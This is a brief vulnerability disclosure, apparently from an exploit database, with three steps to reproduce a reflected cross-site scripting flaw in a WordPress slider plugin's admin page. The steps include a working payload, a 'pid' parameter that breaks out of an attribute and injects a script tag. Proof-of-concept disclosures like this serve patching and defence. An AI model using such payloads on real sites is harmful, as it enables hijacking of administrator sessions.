## https://sploitus.com/exploit?id=WPEX-ID:0352F6F5-CDFD-4CEF-9ED5-FDC1CBCB368A
1. Add a new project
2. As an admin, access the URL: `https://example.com/wp-admin/admin.php?page=simpleal_slider_show&active=0&pid="><script>alert(999)</script>`
3. See the XSS